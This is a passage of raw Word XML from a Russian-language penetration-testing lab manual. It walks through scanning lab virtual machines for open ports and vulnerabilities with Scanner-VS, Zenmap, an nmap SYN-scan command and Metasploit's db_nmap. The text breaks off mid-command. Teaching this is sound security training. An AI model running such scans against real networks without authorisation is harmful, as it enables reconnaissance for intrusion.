          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LibreOffice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Calc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F49CB">
      <w:pPr>
        <w:ind w:left="1134" w:hanging="425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3. Провести поиск уязвимостей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 с помощью веб-интерфейса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Сканер-ВС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(раздел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Поиск уязвимостей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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:left="1134" w:hanging="425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4. Включить результаты сканирования портов и поиска уязвимостей в приложение к отчету о тестировании на проникновение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:jc w:val="center"/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 задачи</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>№1 (с помощью</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>):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Настроить работу виртуальных машин со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Сканер-ВС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и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во внутренней сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="004B5628">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24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4DD6EBE9" wp14:editId="49253192">
            <wp:extent cx="4709160" cy="2522220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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2441" cy="25239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2. Создать проект, в котором будет производиться сканирование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2. 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2480736" wp14:editId="20495F8A">
            <wp:extent cx="5577840" cy="2339340"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="33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35"/>
                    <a:srcRect b="31947"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5581726" cy="2340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3. Перейти в рабочее пространство проекта, созданного в шаге 2.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47A3762B" wp14:editId="64F92137">
            <wp:extent cx="5342656" cy="2329772"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="274" name="image38.png" descr="Безымянн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Безымянный.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="16710"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5341863" cy="232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4. Добавить и запустить задачу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Поиск целей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4B5628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>
            <wp:extent cx="4431738" cy="2152082"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635"/>
            <wp:docPr id="8" name="Рисунок 8" descr="C:\Users\super\Pictures\Screenshots\Screenshot_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per\Pictures\Screenshots\Screenshot_17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588" cy="215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Настройки, необходимые для запуска сканирования сети, находятся на вкладке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Базовые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, где необходимо задать цели сканирования: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>конкретный</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP-адрес или множество IP-адресов — сеть или подсеть.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2A85C700" wp14:editId="69300F8F">
            <wp:extent cx="5940115" cy="2311400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="327" name="image92.png" descr="Безымянн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 descr="Безымянный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B5628" w:rsidRDefault="00EF49CB" w:rsidP="004B5628">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:t xml:space="preserve">Дополнительные настройки сканирования сети расположены на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:t>Расширенные</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB"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4971F24A" wp14:editId="3368D64D">
            <wp:extent cx="5943600" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="362" name="image135.png" descr="Безымянный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 descr="Безымянный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9D31EE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На вкладке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Задача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укажите имя и описание текущего сканирования в соответствующие пустые поля. Если поля оставить пустыми, они будут </w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>заполнены автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="009D31EE" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 5. </w:t>
      </w:r>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустить задачу, созданную в шаге 4. </w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска сканирования на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задачи</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в таблице появится номер задачи, ее имя и индикатор текущего состояния. Желтый цвет индикатора означает, что в текущий момент сканирование выполняется, зеленый — сканирование успешно завершено, красный — процесс сканирования завершен с ошибкой. </w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Пример успешно завершенного сканирования вы можете видеть на рисунке ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="009D31EE" w:rsidRDefault="009D31EE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>
            <wp:extent cx="5936615" cy="1683671"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="9" name="Рисунок 9" descr="C:\Users\super\Pictures\Screenshots\Screenshot_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per\Pictures\Screenshots\Screenshot_17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8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9CB" w:rsidRPr="009D31EE" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 6. </w:t>
      </w:r>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="111111"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверить результаты сканирования в разделе «</w:t>
      </w:r>
      <w:r w:rsidR="009D31EE">
        <w:rPr>
          <w:color w:val="111111"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервисы</w:t>
      </w:r>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="111111"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="009D31EE" w:rsidRDefault="009D31EE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>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5935980" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="10" name="Рисунок 10" descr="C:\Users\super\Pictures\Screenshots\Screenshot_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per\Pictures\Screenshots\Screenshot_17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82"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5936615" cy="274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9D31EE" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В разделе </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Хосты</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в таблице показаны IP-адреса и операционные системы, которые им соответствуют. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRDefault="009D31EE" w:rsidP="00347A12">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD8119F" wp14:editId="3F28C253">
            <wp:extent cx="5052060" cy="2225886"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="11" name="Рисунок 11" descr="C:\Users\super\Pictures\Screenshots\Screenshot_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per\Pictures\Screenshots\Screenshot_17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33" cy="222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A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="009D31EE" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Решение задачи №1 (с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D31EE">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B5628" w:rsidRPr="004B5628" w:rsidRDefault="00347A12" w:rsidP="00EF49CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Шаг 1. Запуск </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zenmap.</w:t>
      </w:r>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t>Запустите</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t>Zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t xml:space="preserve"> (Главное меню → 01 - Сбор информации → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t>zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5628" w:rsidRPr="009D31EE">
        <w:t>). Укажите цель и начните сканирование, нажав на кнопку “Сканирование</w:t>
      </w:r>
      <w:r w:rsidR="004B5628" w:rsidRPr="004B5628">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="65BDC5F3" wp14:editId="3C5FE3CE">
            <wp:extent cx="4437544" cy="3207262"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="25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7414" cy="320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7A12" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:jc w:val="center"/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 задачи №1 (с помощью NMAP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12" w:rsidP="00EF49C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 xml:space="preserve">Шаг 1. Применение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NMAP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> командной строке выполняется команда </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sS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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>адрес_цели</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; -p1-10000, где ключ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sS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 отвечает за TCP SYN сканирование, а ключ -p&lt;порты&gt; указывает по каким портам производить сканирование (один порт, несколько портов или диапазон портов).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRDefault="00EF49CB" w:rsidP="00347A12">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3C29E9A1" wp14:editId="2EF4A46C">
            <wp:extent cx="4404360" cy="2636520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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 rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="7705"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4414446" cy="264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A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="009D31EE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Решение задачи №1 (с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/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b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRPr="00347A12" w:rsidRDefault="00347A12" w:rsidP="00347A12">
      <w:r>
        <w:t xml:space="preserve">Шаг 1. Использование </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">Запустите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> (Главное меню → 08 - Эксплуатация уязвимостей → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> либо в терминале написать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>). Проверьте статус подключения к базе данных (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>). Создайте рабочее пространство с именем «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>» (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>workspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>). Перейдите в рабочее пространство «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>» (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>workspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">). Там выполните </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> -</w:t>
